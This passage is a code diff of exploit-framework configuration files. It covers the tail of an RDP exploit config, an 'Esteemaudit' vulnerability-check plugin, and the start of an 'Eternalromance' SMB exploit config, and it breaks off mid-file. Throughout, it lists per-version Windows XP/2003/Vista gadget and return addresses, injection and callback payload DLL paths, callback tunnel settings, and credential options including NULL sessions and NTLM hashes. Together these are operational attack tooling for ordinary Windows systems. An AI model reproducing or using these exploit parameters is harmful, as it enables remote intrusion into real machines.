<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE382F8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF95DF8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE211B4</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP1' description='Windows 2003 SP1'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x080190D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x08005e85</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0800bedd</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x08011e7a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0801118e</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x08011fef</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x080128cc</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0000008f</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x08015074</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x40</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x080192D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x08176DD8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0800119C</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x080011CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP2' description='Windows 2003 SP2'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x080190D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x08005e85</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0800bedd</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x08011e7a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0801118e</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x08011fef</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x080128cc</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0000008f</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x08015074</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x40</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x080192D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x08176DD8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0800119C</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x080011CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP1|2' description='Windows 2003 SP1 or SP2'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x080190D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x08005e85</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0800bedd</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x08011e7a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0801118e</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x08011fef</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x080128cc</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0000008f</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x08015074</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x40</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x080192D8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x08176DD8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0800119C</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x080011CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000012</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000057</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</paramgroup>
|
||||
<paramgroup name='x86 64-bit' description='Target is running on an x86 64-bit processor'>
|
||||
<parameter type='LocalFile' name='MigrateProcessDLL' description=' The DLL that will be used to inject into a remote process'>
|
||||
<default>D:\DSZOPSDISK\storage\rudo_x64.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='CallbackPayloadDLL' description='The DLL that will be used as a callback payload'>
|
||||
<default>D:\DSZOPSDISK\storage\capa_x64.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='ListenPayloadDLL' description='The DLL that will be used as a listen payload'>
|
||||
<default>D:\DSZOPSDISK\storage\lipa_x64.dll</default>
|
||||
</parameter>
|
||||
<paramchoice name='Target' description='Suspected OS and language pack'>
|
||||
<default>Other|64</default>
|
||||
<paramgroup name='Eng|Jpn|64' description='English/Japanese 64-bit XP/2003'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0FDC9870</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0FDBE483</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0FDC28CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0FDB0EDC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0FDC2BE7</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0FDBC9C9</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x0fdbbe19</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x0fdbd72d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0FF5E2B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fda43fa</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0fdb9c6d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FDC9A70</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF5D170</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FDA1388</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FDA1370</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Other|64' description="Other languages' 64-bit XP/2003">
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0FDA9870</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0FD9E483</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0FDA28CC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0FD90EDC</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0x0FDA2BE7</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0FD9C9C9</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0x0fd9be19</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x0fd9d72d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0FF3E2B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fd843fa</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0fd99c6d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FDA9A70</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF3D170</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FD81388</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FD81370</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
<outputparameters>
|
||||
<paramchoice name='Contract' description='The contract fulfilled by this plugin'>
|
||||
<value>StagedUpload</value>
|
||||
<paramgroup name='StagedUpload' description=''>
|
||||
<parameter type='Socket' name='ConnectedTcp' description='The connected socket'/>
|
||||
<parameter type='U8' name='XorMask' description='Masking byte'/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</outputparameters>
|
||||
<redirection>
|
||||
<local protocol='TCP' name='Launch Tunnel' listenport='TargetPort' listenaddr='TargetIp' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
|
||||
<local protocol='TCP' name='Callin Tunnel' listenport='CallinPort' listenaddr='TargetIp' closeoncompletion='false' destaddr='TargetIp' destport='ListenPort'/>
|
||||
<remote listenport='CallbackPort' protocol='TCP' name='Callback Tunnel' listenaddr='CallbackIp' destport='CallbackLocalPort'/>
|
||||
</redirection>
|
||||
<logic>
|
||||
<and>
|
||||
<service name='rdp'>
|
||||
<bindtopath path="//service[name='rdp']/port" name='TargetPort'/>
|
||||
</service>
|
||||
<or>
|
||||
<os servicepack='0' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP0'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP1'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP0|1'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP2'/>
|
||||
</os>
|
||||
<os servicepack='3' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP3'/>
|
||||
</os>
|
||||
<os servicepack='3' name='Windows XP' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='XPSP2|3'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows 2003' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='W2K3SP0'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows 2003' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='W2K3SP1'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows 2003' family='windows' architecture='x86 32-bit'>
|
||||
<bindtovalue name='Target' value='W2K3SP2'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='3' name='Windows XP' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows 2003' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows 2003' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
<os servicepack='2' name='Windows 2003' family='windows' architecture='x86 64-bit'>
|
||||
<bindtovalue name='Target' value='XP|2K3|64'/>
|
||||
</os>
|
||||
</or>
|
||||
<bindtopath path='//identifier' name='TargetIp'/>
|
||||
<bindtovalue name='Payload' value='Callback'/>
|
||||
</and>
|
||||
</logic>
|
||||
</config>
|
BIN
windows/exploits/Esteemaudit-2.1.0.exe
Normal file
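--- a/windows/exploits/Esteemaudit-2.1.0.fb
+++ b/windows/exploits/Esteemaudit-2.1.0.fb
@@ -0,0 +1,22 @@
+<?xml version="1.0"?>
+<t:config id="2a7d82545aa7bdf8b44ee403dbebf2b360f55b3a"
+name="Esteemaudit"
+version="2.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:touchlist>
+<t:plugin name="Esteemaudittouch"
+displayname="ESAU Vulnerability Touch"
+description="Check if Target is vulnerable to ESAU"
+postmessage="ESAU requires vulnerable target">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+<t:ivparam name="PacketTimeout" value="PacketTimeout"/>
+<t:oparam name="Architecture" value="Architecture"/>
+<t:oparam name="Target" value="Target"/>
+<t:oparam name="RdpLibHertz" value="RdpLibHertz"/>
+</t:plugin>
+</t:touchlist>
+</t:config>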
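--- a/windows/exploits/Eternalromance-1.3.0.0.xml
+++ b/windows/exploits/Eternalromance-1.3.0.0.xml
@@ -0,0 +1,455 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<config xmlns="urn:trch"
+id="7fca44399ae06e52cb50bfdf9ce6bd0f2ed5d28b"
+name="Eternalromance"
+version="1.3.0"
+configversion="1.3.0.0"
+schemaversion="2.0.0">
+<inputparameters>
+<!-- All plugins that perform blocking network calls must have a NetworkTimeout
+parameter or its equivalent -->
+<parameter name="NetworkTimeout"
+description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
+type="S16">
+<default>60</default>
+</parameter>
+<parameter name="TargetIp"
+description="Target IP Address"
+type="IPv4"/>
+<parameter name="TargetPort" description="Target TCP port" type="TcpPort">
+<default>445</default>
+</parameter>
+<parameter name="MaxExploitAttempts"
+description="Number of tries to exploit. Default 3"
+type="U32"
+hidden="true">
+<default>3</default>
+</parameter>
+<parameter name="PipeName"
+description="The named pipe to use"
+type="String">
+</parameter>
+
+<paramchoice name="ExploitMethod" description="Which exploit method to use">
+<default>Default</default>
+
+<paramgroup name="Default" description="Use the best exploit method(s) for the target OS">
+<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
+<default>0</default>
+</parameter>
+</paramgroup>
+
+<paramgroup name="Fish-in-a-barrel" description="Most reliable exploit method (XP/2k3 only)">
+<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
+<default>1</default>
+</parameter>
+</paramgroup>
+
+<paramgroup name="Matched-pairs" description="Next reliable exploit method (XP/Win7/2k8R2 only)">
+<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
+<default>2</default>
+</parameter>
+</paramgroup>
+
+<paramgroup name="Classic-Romance" description="Original LargePageGroom exploit method (All OS Versions)">
+<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
+<default>3</default>
+</parameter>
+</paramgroup>
+
+</paramchoice>
+
+<paramchoice name="Credentials" description="Type of credentials to use">
+<default>Anonymous</default>
+
+<paramgroup name="Anonymous" description="Anonymous (NULL session)">
+<parameter name="CredChoice" type="U32" hidden="true" description="">
+<default>0</default>
+</parameter>
+<parameter name="Username" type="Buffer" hidden="true" description="">
+<default></default>
+</parameter>
+
+<parameter name="Password" type="Buffer" hidden="true" description="">
+<default></default>
+</parameter>
+</paramgroup>
+
+<paramgroup name="Guest" description="Guest account">
+<parameter name="CredChoice" type="U32" hidden="true" description="">
+<default>1</default>
+</parameter>
+<parameter name="Password" type="Buffer" hidden="true" description="">
+<default></default>
+</parameter>
+</paramgroup>
+
+<paramgroup name="Blank" description="User account with no password set">
+<parameter name="CredChoice" type="U32" hidden="true" description="">
+<default>2</default>
+</parameter>
+<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
+<parameter name="Password" type="Buffer" hidden="true" description="">
+<default></default>
+</parameter>
+</paramgroup>
+
+<paramgroup name="Password" description="User name and password">
+<parameter name="CredChoice" type="U32" hidden="true" description="">
+<default>3</default>
+</parameter>
+<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
+<parameter name="Password" type="Buffer" description="Password entered as hex bytes (in unicode)"/>
+</paramgroup>
+
+<paramgroup name="NTLM" description="User name and NTLM hash">
+<parameter name="CredChoice" type="U32" hidden="true" description="">
+<default>4</default>
+</parameter>
+<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
+<parameter name="NtlmHash" type="Buffer" description="NTLM password hash (in hex)"/>
+</paramgroup>
+</paramchoice>
+
+<paramchoice name="Protocol" description="SMB (default port 445) or NBT (default port 139)">
+<default>SMB</default>
+<paramgroup name="SMB" description="">
+<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name="NBT" description="">
+<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
+<default>1</default>
+</parameter>
+</paramgroup>
+</paramchoice>
+
+<paramchoice name="Target" description="Operating System, Service Pack, of target OS">
+<paramgroup name="XP_SP0SP1_X86" description="Windows XP Sp0 and Sp1, 32-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>1</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name="XP_SP2SP3_X86" description="Windows XP Sp2 and Sp3, 32-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>1</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>2</default>
+</parameter>
+</paramgroup>
+<paramgroup name="XP_SP1_X64" description="Windows XP Sp1, 64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>2</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>1</default>
+</parameter>
+</paramgroup>
+<paramgroup name="XP_SP2_X64" description="Windows XP Sp2, 64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>2</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>2</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2003_SP0" description="Windows Sever 2003 Sp0, 32-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>2</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2003_SP1" description="Windows Sever 2003 Sp1, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>2</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>1</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2003_SP2" description="Windows Sever 2003 Sp2, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>5</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>2</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>2</default>
+</parameter>
+</paramgroup>
+<paramgroup name="VISTA_SP0" description="Windows Vista Sp0, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>0</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name="VISTA_SP1" description="Windows Vista Sp1, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>0</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>1</default>
+</parameter>
+</paramgroup>
+<paramgroup name="VISTA_SP2" description="Windows Vista Sp2, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>0</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>2</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2008_SP0" description="Windows Server 2008 Sp0, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>0</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>0</default>
+</parameter>
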